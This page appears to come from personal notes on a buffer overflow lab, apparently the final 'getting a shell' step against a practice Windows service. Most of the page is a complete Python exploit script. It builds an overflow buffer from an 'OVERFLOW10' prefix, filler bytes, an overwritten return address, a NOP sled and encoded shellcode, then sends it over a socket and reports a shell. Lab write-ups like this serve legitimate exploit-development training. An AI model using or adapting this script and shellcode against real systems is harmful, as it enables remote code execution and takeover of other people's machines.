Getting a Shell

With some final modification to the POC, a shell will be obtained.

Adding Nops & Payload

Now that we have all parts to the puzzle, all we have to do is modify the code one last time to include our newly generated payload, add some NOPs (“\x90”) to give some padding for our payload, and run it!

payload.py

#!/usr/bin/python
import socket

try:
    print ("\nSending evil buffer...")

    payload = ("\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
    "\x65\x02\xba\x95\x83\xee\xfc\xe2\xf4\x99\xea\x38\x95\x65\x02"
    "\xda\x1c\x80\x33\x7a\xf1\xee\x52\x8a\x1e\x37\x0e\x31\xc7\x71"
    "\x89\xc8\xbd\x6a\xb5\xf0\xb3\x54\xfd\x16\xa9\x04\x7e\xb8\xb9"
    "\x45\xc3\x75\x98\x64\xc5\x58\x67\x37\x55\x31\xc7\x75\x89\xf0"
    "\xa9\xee\x4e\xab\xed\x86\x4a\xbb\x44\x34\x89\xe3\xb5\x64\xd1"
    "\x31\xdc\x7d\xe1\x80\xdc\xee\x36\x31\x94\xb3\x33\x45\x39\xa4"
    "\xcd\xb7\x94\xa2\x3a\x5a\xe0\x93\x01\xc7\x6d\x5e\x7f\x9e\xe0"
    "\x81\x5a\x31\xcd\x41\x03\x69\xf3\xee\x0e\xf1\x1e\x3d\x1e\xbb"
    "\x46\xee\x06\x31\x94\xb5\x8b\xfe\xb1\x41\x59\xe1\xf4\x3c\x58"
    "\xeb\x6a\x85\x5d\xe5\xcf\xee\x10\x51\x18\x38\x6a\x89\xa7\x65"
    "\x02\xd2\xe2\x16\x30\xe5\xc1\x0d\x4e\xcd\xb3\x62\xfd\x6f\x2d"
    "\xf5\x03\xba\x95\x4c\xc6\xee\xc5\x0d\x2b\x3a\xfe\x65\xfd\x6f"
    "\xc5\x35\x52\xea\xd5\x35\x42\xea\xfd\x8f\x0d\x65\x75\x9a\xd7"
    "\x2d\xff\x60\x6a\x7a\x3d\x65\x6e\xd2\x97\x65\x02\x8f\x1c\x83"
    "\x68\xaa\xc3\x32\x6a\x23\x30\x11\x63\x45\x40\xe0\xc2\xce\x99"
    "\x9a\x4c\xb2\xe0\x89\x6a\x4a\x20\xc7\x54\x45\x40\x0d\x61\xd7"
    "\xf1\x65\x8b\x59\xc2\x32\x55\x8b\x63\x0f\x10\xe3\xc3\x87\xff"
    "\xdc\x52\x21\x26\x86\x94\x64\x8f\xfe\xb1\x75\xc4\xba\xd1\x31"
    "\x52\xec\xc3\x33\x44\xec\xdb\x33\x54\xe9\xc3\x0d\x7b\x76\xaa"
    "\xe3\xfd\x6f\x1c\x85\x4c\xec\xd3\x9a\x32\xd2\x9d\xe2\x1f\xda"
    "\x6a\xb0\xb9\x5a\x88\x4f\x08\xd2\x33\xf0\xbf\x27\x6a\xb0\x3e"
    "\xbc\xe9\x6f\x82\x41\x75\x10\x07\x01\xd2\x76\x70\xd5\xff\x65"
    "\x51\x45\x40")
    
    prefix = "OVERFLOW10 "
    filler = "A" * 537 
    eip = "\xaf\x11\x50\x62" * 4 #0x625011AF
    nop = "\x90" * 32
    buffer = prefix + filler + eip + nop + payload

    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

    s.connect(("windows.box", 1337))
    s.send(buffer)

    s.close()

    print ("\nDone!")
  
except:
    print ("\nCould not connect!")

Exploitation

python payload.py

And...there we go! We've gotta shell 😊

PreviousGenerating Shellcode NextWifi Pineapple - Tetra

Last updated 2 years ago